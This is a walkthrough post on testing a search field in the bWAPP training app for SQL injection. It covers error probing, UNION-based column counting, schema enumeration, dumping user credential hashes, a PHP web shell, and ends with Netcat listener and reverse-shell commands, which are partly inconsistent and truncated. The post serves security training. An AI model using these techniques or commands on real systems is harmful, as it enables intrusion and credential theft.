Premise
In this post walk-through, we demonstrated how to conduct security testing for SQL Databases deployed to operate search fields. Specifically, we tested MySQL instance deployed on bWAPP for demonstration purposes.
Skills Learned
- bWAPP
- OWASP
- SQL Injection
- MySQL
First, I’ll show you how to determine if a search box is vulnerable to SQL injection. By simply entering a single quote ('
) into the search field, we can trigger a SQL syntax error. This error message not only confirms the vulnerability but also reveals the type of database being used, which in this case is MariaDB.
Next, I’ll explain the structure of the backend SQL query that the application is likely using. Understanding this query is crucial for crafting our attack. The query probably uses the LIKE
operator with wildcard characters (%
) to search for movies in the database.
With this knowledge, I’ll demonstrate how to determine the number of columns in the database table. This is a critical step in any SQL injection attack. I’ll use a UNION SELECT
statement and incrementally add columns until the error message disappears. In our case, we’ll find that there are seven columns.
Once we know the number of columns, we can start extracting valuable information from the database. I’ll show you how to retrieve the following:
- Database Name: Using the
database()
function. - Database Version: Using the
version()
function. This information can be used to find known exploits for that specific version. - Table Names: By querying the
information_schema.tables
. - Column Names: By querying the
information_schema.columns
for a specific table, such as the “users” table.
After mapping out the database, I’ll show you how to dump user credentials, including usernames and hashed passwords, from the “users” table.
Finally, I’ll demonstrate the ultimate goal of our attack: achieving a reverse shell. I’ll inject a PHP code snippet to create a web shell, which will allow us to execute commands on the server. I’ll then set up a Netcat listener on my machine and use the web shell to establish a reverse shell connection, giving me full control over the system.
Technical Commands
Here are all the technical commands that I used in the video:
nc -lvp 455
whoami
netcat 192.168.1.7 4545 -e